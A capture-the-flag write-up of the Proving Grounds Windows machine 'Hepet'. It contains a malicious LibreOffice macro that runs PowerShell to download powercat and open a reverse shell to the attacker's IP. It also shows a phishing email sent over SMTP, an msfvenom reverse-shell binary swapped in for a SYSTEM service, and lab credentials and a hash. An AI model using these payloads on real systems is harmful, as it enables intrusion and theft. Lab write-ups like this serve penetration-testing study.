Hepet

Source: Proving Grounds OS: Windows Community Rating: Very Hard

Enumeration & Reconnaissance

• Started with the usual autorecon and was literally bombarded with open ports: SMTP (25), Finger (79), 105, 106, Pop3 (110), 135, 139, IMAP (143), HTTP (443), 445, HTTP (2224), 5040, HTTP (8000), 11100, FTP (20001), 33006, 49664-49669

• Lots to uncover...

Service Analysis

• I noticed that there were too many email-related ports, so maybe that was a vector to explore. I started with HTTP as I usually do, but reached nowhere, both the 443 and 8000 ports hosted the same website, essentially a landing page with no functionality (just some pictures of the team).

HTTP Page

• On Finger, I learned a new technique to enumerate users using a tool from pentestmonkey. With the following command, I was able to get a list of users that matched those on the website:

./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 192.168.170.140 | grep -v "is not known"

Finger User Enumeration

Gaining Initial Access

• I knew that I needed to access the emails, but I still needed a password. With the list of users in hand, I tried to bruteforce Pop3; however, that didn’t work and the server blocked me, forcing me to revert the machine to get removed from the blacklist. The HTTP interface wasn’t interactive and nothing of value was fuzzed.

Bruteforcing Block

• FTP (20001) allowed anonymous login, so I grabbed its contents using:

wget -r ftp://Anonymous:pass@192.168.170.140:20001

FTP Tree

• But nothing of interest was found there, it was just the source code of some application with no valuable env/config files. I also checked the SMB ports, but again, nothing useful emerged.

• I then moved to port 2224, which hosted a mailing list subscriber service. I spent some time on this one, even found a few CVEs, but nothing worked.

Port 2224

• After minutes of hitting my head against a wall and going in circles, I started searching for hints. Remember the HTTP application with no functions? One of the user’s job titles looked weird, while everyone else was listed as Public Relations, Writer, etc., one user had the text: SicMundusCreatusEst. I could’ve spent hours and never thought the password might be hidden there, CTF style..

Password as Job Description

• Anyway, I tried to access the email using that password and it worked!

  • Using telnet:

telnet 192.168.118.46 110
USER jonas
PASS SicMundusCreatusEst
LIST
RETR 1
RETR 2
RETR 3
RETR 4

• I checked the emails one by one. One email stated: "If you can please send to mailadmin the spreadsheet for printing with all the company contacts will be really apreciated."

We Should Send to mailadmin

• Another email said: "We will be changing our office suite to LibreOffice. For the moment, all the spreadsheets and documents will be first procesed in the mail server directly to check the compatibility."

Spreadsheets Using LibreOffice

• So, emails are to be sent to mailadmin and they are of type spreadsheets. I needed to inject a macro into a spreadsheet file and send it. But how do I send the email? I couldn’t use Pop3 or IMAP. It took me a while to remember that we had SMTP. I guess it’s one of the side effects of doing boxes at night.

• I created the file and injected this macro into it:

Sub Main
  Shell("cmd /c powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.170/powercat.ps1');powercat -c 192.168.45.170 -p 9999 -e powershell")
End Sub

• Then I configured it to run once the document was opened.

• Another dumb mistake I made was sending an ODT file (a word file) instead of an ODS file (a spreadsheet, as highlighted in the email!), costing me another hour.

Losing an Hour Because I Was Sending .odt

• To send the email, I used the following command:

sendemail -f 'jonas@localhost' \
-t 'mailadmin@localhost' \
-s 192.168.170.140:25 \
-u 'Good Morning Sir' \
-m 'Open this file or die' \
-a ShitIWasSendingODT.ods

• After sending the email with the spreadsheet attachment, a few minutes later I got the shell back! Finally, we were in.

Finally We Are In!

Privilege Escalation

• Next, I uploaded Winpeas after checking whoami /priv and reviewing installed programs. Winpeas exposed a service running under our user's home—veyon-service.exe.

WinPEAS Exposed Service

• To check the privileges of the service, I ran:

sc.exe qc VeyonService

Checking the Service

• That confirmed it was running as SYSTEM.

• I then created a shell using msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.45.170 LPORT=8178

• I replaced the service binary by renaming the original:

mv veyon-service.exe veyon-service-backup.exe
mv shell.exe veyon-service.exe

Replacing the Service Executable with the Shell

• Finally, I restarted the windows so that the service (our “reverse shell”) is restarted and run as SYSTEM by executing:

shutdown /r

Privilege Escalation

• Bingo, that was it. After a minute or two, I got a privileged shell back.

• If that hadn’t worked, Winpeas had exposed a password for the user we logged in as: Ela Arwel:LadderWheelGallon443 and the hash: Ela Arwel::HEPET:1122334455667788:c8c450a62eb98c71153a511632034e0a:01010000000000007f8f30011795db01a812cd26f72e3cdc000000000800300030000000000000000000000000200000fddba21abefbbfef27bcf4f1785a7040c72d7d3aec636c5ca8979886911e3b570a00100000000000000000000000000000000000090000000000000000000000 Both could've been explored if the service hijack didn't work!

Lessons Learned

• Keep an eye out for inconsistencies, like that password I totally missed.

• Email-related services can hinted towards the entry points.

• Enumerating users via finger enumeration tool exposed the users.

• Always verify file types before sending payloads, a mistake between ODT and ODS can cost precious time.

• SMTP can be used to send emails.

• Replacing a service binary with a reverse shell executable is an effective privilege escalation method when the service runs as SYSTEM.